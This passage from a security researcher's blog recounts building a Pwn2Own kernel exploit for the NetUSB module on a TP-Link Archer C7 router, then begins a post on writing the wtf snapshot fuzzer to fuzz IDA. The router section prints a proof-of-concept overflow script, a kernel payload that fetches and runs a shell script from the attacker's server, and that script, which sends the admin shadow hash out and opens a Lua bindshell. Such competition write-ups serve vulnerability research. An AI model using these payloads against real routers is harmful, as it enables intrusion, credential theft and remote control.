udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq


At first sight, the following processes looked interesting: - the uhttpd HTTP server, - the third-party dnsmasq service that potentially could be unpatched to upstream bugs (unlikely?), - the tdpServer which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.

One another thing I burned time on is to go through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out if dnsmasq was properly patched to recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed different 😔. Dead-end.

NetUSB shenanigans

There were two strange lines in the netstat output from above that did stand out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -


Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where the attacker inputs is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
// ...
result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
if(result) {
v64[0] = _bswapw(v64[0]); <----------------------- attacker controlled
Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0); <---- overflow
// ...


I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefuly, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
if(SbusConnection)
if(Buffer) {
if(BufferLen) {
while (1) {
GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
if ( GetLen <= 0 )
break;
BufferLen -= GetLen;
Buffer = (char *)Buffer + GetLen;
if ( !BufferLen )
return 1;
}
kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
return 0;
}
else {
return 1;
}
} else {
// ...
return 0;
}
}
else {
// ...
return 0;
}
}


KTCP_get is basically a wrapper around ks_recv, which basically means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data I wanted. If you are interested to learn on how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py or you can also read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
# Version
s.send(b'\x56\x04')
# Send random data
s.send(aes_ctx.encrypt(b'a' * 16))
_ = s.recv(16)
# Receive & send back the random numbers.
challenge = s.recv(16)
s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
length = len(name)
assert length - 1 < 63
s.send(le32(length))
b = name
if type(name) == str:
b = bytes(name, 'ascii')
s.send(b)

def create_connection(target, port, name):
second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
send_handshake(s, aes_ctx)
send_bus_name(s, name)
return s, aes_ctx

def main():
parser = argparse.ArgumentParser('Zenith PoC2')
args = parser.parse_args()
s, _ = create_connection(args.target, netusb_port, 'PoC2')
s.send(le8(0xff))
s.send(le8(0x21))
s.send(le32(0xff_ff_ff_ff))
p = b'\xab' * (0x1_000 * 100)
s.send(p)


Another interesting detail was that the allocation function is mallocPageBuf which I didn't know about. After looking into its implementation, it eventually calls into _get_free_pages which is part of the Linux kernel. _get_free_pages allocates 2**n number of pages, and is implemented using what is called, a Binary Buddy Allocator. I wasn't familiar with that kind of allocator, and ended-up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content and I was able to overflow the pages with pretty much as much data as I wanted. The only thing that I couldn't fully control was the size passed to the allocation. The only limitation was that I could only trigger a mallocPageBuf call with a size in the following interval: [0, 8] because of the integer overflow. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke _get_free_pages.

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
// ...
v1 = vsprintf(v6, a1);
v2 = v1 < 257;
v3 = v1 + 1;
if(!v2) {
v6[256] = 0;
v3 = 257;
}
v5 = v3;
kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
return printk("<1>%s", v6);
}


Pretty funny right?

Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob so this lack of introspections wasn't going to work. What are my options?

Well, as I mentioned earlier TP-Link is maintaining a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement with my current situation. I would be able to hook-up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering but it was in fact not it. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both of the kernel configurations until I end up with a bootable image that has a configuration as close as possible from the kernel running on the device. Same kernel version, allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any types used by this structure can do the same which means that looking at the main definition of a structure is not enough.

struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
/* List of functions to handle Wireless Extensions (instead of ioctl).
* See <net/iw_handler.h> for details. Jean II */
const struct iw_handler_def * wireless_handlers;
/* Instance data managed by the core of Wireless Extensions. */
struct iw_public_data * wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
struct netdev_rx_queue  *_rx;

/* Number of RX queues allocated at register_netdev() time */
unsigned int    num_rx_queues;

/* Number of RX queues currently active in device */
unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
/* CPU reverse-mapping for RX completion interrupts, indexed
* by RX queue number.  Assigned by driver.  This must only be
* set if the ndo_rx_flow_steer operation is defined. */
struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
//...
};


Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and try to look at the code / structures involved and see if a kernel configuration option would impact the layout of a relevant structure. From there, I could see the difference between the kernel configuration for my bootable QEMU image and the kernel I had built from the GPL and see where were mismatches. If there was one, I could simply turn the option on or off, recompile and hope that it doesn't make the kernel unbootable under QEMU.

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

[email protected]:~/pwn2own$qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337 [...] [email protected]:~# ./start.sh [ 89.092000] new slab @ 86964000 [ 89.108000] kcg 333 :GPL NetUSB up! [ 89.240000] NetUSB: module license 'Proprietary' taints kernel. [ 89.240000] Disabling lock debugging due to kernel taint [ 89.268000] kc 90 : run_telnetDBGDServer start [ 89.272000] kc 227 : init_DebugD end [ 89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00 [ 89.272000] INFO17FA: 7437: Archer C7 :Archer C7 [ 89.272000] INFO17FB: AUTH ISOC [ 89.272000] INFO17FC: filterAudio [ 89.272000] usbcore: registered new interface driver KC NetUSB General Driver [ 89.276000] INFO0145: init proc : PAGE_SIZE 4096 [ 89.280000] INFO16EC: infomap 869c6e38 [ 89.280000] INFO16EF: sleep to wait eth0 to wake up [ 89.280000] INFO15BF: tcpConnector() started... : eth0 NetUSB 160207 0 - Live 0x869c0000 (P) GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000 [email protected]:~# [ 92.308000] INFO1572: Bind to eth0  For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones): - I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM and chroot in those folders and SHOULD be able to reproduce what I described. Or at least, be very close from reproducing. - I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz. - You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.

Enters Zenith

Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The linux kernel version was old enough that it didn't have a bunch of more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets Andrey Konovalov describes in details an attack that looked like could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher order to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000 which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could be now used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
// ...
case 0x50:
AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
if (!AllocatedBuffer) {
return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
}
// ...
if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))


Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error I started to notice that if I was taking a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close from my buffer. To this day, I haven't fully debugged where it exactly came from but as this was my only lead I went along with it.

The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute the heap directly which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d

# ...

def main(stdscr):
# ...
_3mb = 3 * 1_024 * 1_024
leaker.wait_for_one()
y += 1


My final exploit, Zenith, overflows an adjacent wait_queue_head_t.head.next structure that is placed by the socket stack of the Linux kernel with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). This is the definition of the structure:

struct wait_queue_head {
spinlock_t    lock;
};

struct wait_queue_entry {
unsigned int    flags;
void      *private;
wait_queue_func_t func;
};


This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
int nr_exclusive, int wake_flags, void *key)
{
wait_queue_t *curr, *next;

unsigned flags = curr->flags;

if (curr->func(curr, mode, wake_flags, key) &&
(flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
break;
}
}


This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00 (gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff (gdb) c Continuing. sock_recvmsg(dst=0xffffffff85173390) Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1) at kernel/sched/core.c:3375 3375 kernel/sched/core.c: No such file or directory. (gdb) p *q$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34


Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
.word arg1
.word arg2
envp: .word 0


The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?(grep -E admin: /etc/shadow) lua -e 'local k=require("socket"); local s=assert(k.bind("*",os.getenv("LPORT"))); local c=s:accept(); while true do local r,x=c:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();'  The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class). OK at that point, it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability wise, it worked well enough on the QEMU environment: about 3 times about 5 I would say. Good enough. I started to port over the exploit to the real device and to my surprise it also worked there as well. The reliability was poorer but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable but hey I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥: Beautiful. Time to register! Entering the contest As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI stuff would throw our exploits on the environment they had set-up. At that point we had two exploits and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link pushed an update for the router 😳. I thought Damn. I was at work when I saw the news and was stressed about the bug getting killed. Or worried that the update could have changed anything that my exploit was relying on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading but it didn't have any hints suggesting that they had updated either NetUSB or the kernel which was.. good. I extracted the file off the firmware file with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and ... it was the same. Wow. What a relief 😮‍💨. When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own. On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆. Wrapping up Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it: • Attacking the kernel might be cool, but it is an absolute pain to debug / set-up an environment. I probably would not go that route again if I was doing it again. • Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive. • Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time. • The Ghidra disassembler decompiles MIPS32 code pretty well. It wasn't perfect but a net positive. • I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money but maybe it would be good for me to do a better job at taking a look at more than a target instead of directly diving deep into one exclusively. • The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions. • Higher payouts don't necessarily mean a harder target. You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references: I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽. Oh, and come hangout on Diary of reverse-engineering's Discord server with us! Building a new snapshot fuzzer & fuzzing IDA 15 July 2021 at 15:00 Introduction It is January 2020 and it is this time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows maybe it'll be the year where I get good at computers I thought (spoiler alert: it wasn't). One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like Windows Hypervisor platform APIs, KVM APIs but also try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows targets, user or kernel, application or service, kernel or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems. Great, the plan was to develop this Windows snapshot-based fuzzer running the target code into some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide basic features that you expect from a modern fuzzer: code coverage, crash detection, general mutator, cross-platform support, fast restore, etc. Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons: 1. It is a complex Windows user-mode application, 2. It parses a bunch of binary files, 3. The application is heavy and is slow to start. The snapshot approach could help fuzz it faster than traditionally, 4. It has a bug bounty. In this blog post, I will walk you through the birth of what the fuzz, its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75. There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers. Architecture At this point I had a pretty good idea of what the final product should look like and how a user would use wtf: 1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state. 2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases. 3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory. 4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat. After laying out the plan, I realized that I didn't have code that parsed Windows kernel-crash dump which is essential for wtf. So I wrote kdmp-parser which is a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available on the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a Windbg Javascript extension to do the work and so I reused it bdump.js. Once I was able to extract the physical memory & the CPU state I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run intel 64-bit code, knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs devices so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc. Bochscpu 101 The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because: 1. No need to load an entire dump of memory inside the emulator when it starts, 2. Only used memory gets mapped making the instance very light in memory usage. I also need to introduce a few acronyms that I use everywhere: 1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator. 2. GVA: Guest virtual address. This is guest virtual memory. 3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment. To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like: void StaticGpaMissingHandler(const uint64_t Gpa) { const Gpa_t AlignedGpa = Gpa_t(Gpa).Align(); BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n", AlignedGpa, Gpa); const void *DmpPage = reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage( AlignedGpa); if (DmpPage == nullptr) { BochsHooksDebugPrint( "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n", AlignedGpa); } uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size); if (Page == nullptr) { fmt::print("Failed to allocate memory in GpaMissingHandler.\n"); __debugbreak(); } if (DmpPage) { // // Copy the dump page into the new page. // memcpy(Page, DmpPage, Page::Size); } else { // // Fake it 'till you make it. // memset(Page, 0, Page::Size); } // // Tell bochscpu that we inserted a page backing the requested GPA. // bochscpu_mem_page_insert(AlignedGpa.U64(), Page); }  It is simple: 1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory, 2. we populate its content using the crash dump. 3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways. To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState: void BochscpuBackend_t::LoadState(const CpuState_t &State) { bochscpu_cpu_state_t Bochs; memset(&Bochs, 0, sizeof(Bochs)); Seed_ = State.Seed; Bochs.bochscpu_seed = State.Seed; Bochs.rax = State.Rax; Bochs.rbx = State.Rbx; //... Bochs.rflags = State.Rflags; Bochs.tsc = State.Tsc; Bochs.apic_base = State.ApicBase; Bochs.sysenter_cs = State.SysenterCs; Bochs.sysenter_esp = State.SysenterEsp; Bochs.sysenter_eip = State.SysenterEip; Bochs.pat = State.Pat; Bochs.efer = uint32_t(State.Efer.Flags); Bochs.star = State.Star; Bochs.lstar = State.Lstar; Bochs.cstar = State.Cstar; Bochs.sfmask = State.Sfmask; Bochs.kernel_gs_base = State.KernelGsBase; Bochs.tsc_aux = State.TscAux; Bochs.fpcw = State.Fpcw; Bochs.fpsw = State.Fpsw; Bochs.fptw = State.Fptw; Bochs.cr0 = uint32_t(State.Cr0.Flags); Bochs.cr2 = State.Cr2; Bochs.cr3 = State.Cr3; Bochs.cr4 = uint32_t(State.Cr4.Flags); Bochs.cr8 = State.Cr8; Bochs.xcr0 = State.Xcr0; Bochs.dr0 = State.Dr0; Bochs.dr1 = State.Dr1; Bochs.dr2 = State.Dr2; Bochs.dr3 = State.Dr3; Bochs.dr6 = State.Dr6; Bochs.dr7 = State.Dr7; Bochs.mxcsr = State.Mxcsr; Bochs.mxcsr_mask = State.MxcsrMask; Bochs.fpop = State.Fpop; #define SEG(_Bochs_, _Whv_) \ { \ Bochs._Bochs_.attr = State._Whv_.Attr; \ Bochs._Bochs_.base = State._Whv_.Base; \ Bochs._Bochs_.limit = State._Whv_.Limit; \ Bochs._Bochs_.present = State._Whv_.Present; \ Bochs._Bochs_.selector = State._Whv_.Selector; \ } SEG(es, Es); SEG(cs, Cs); SEG(ss, Ss); SEG(ds, Ds); SEG(fs, Fs); SEG(gs, Gs); SEG(tr, Tr); SEG(ldtr, Ldtr); #undef SEG #define GLOBALSEG(_Bochs_, _Whv_) \ { \ Bochs._Bochs_.base = State._Whv_.Base; \ Bochs._Bochs_.limit = State._Whv_.Limit; \ } GLOBALSEG(gdtr, Gdtr); GLOBALSEG(idtr, Idtr); // ... bochscpu_cpu_set_state(Cpu_, &Bochs); }  In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this: // // Prepare the hooks. // Hooks_.ctx = this; Hooks_.after_execution = StaticAfterExecutionHook; Hooks_.before_execution = StaticBeforeExecutionHook; Hooks_.lin_access = StaticLinAccessHook; Hooks_.interrupt = StaticInterruptHook; Hooks_.exception = StaticExceptionHook; 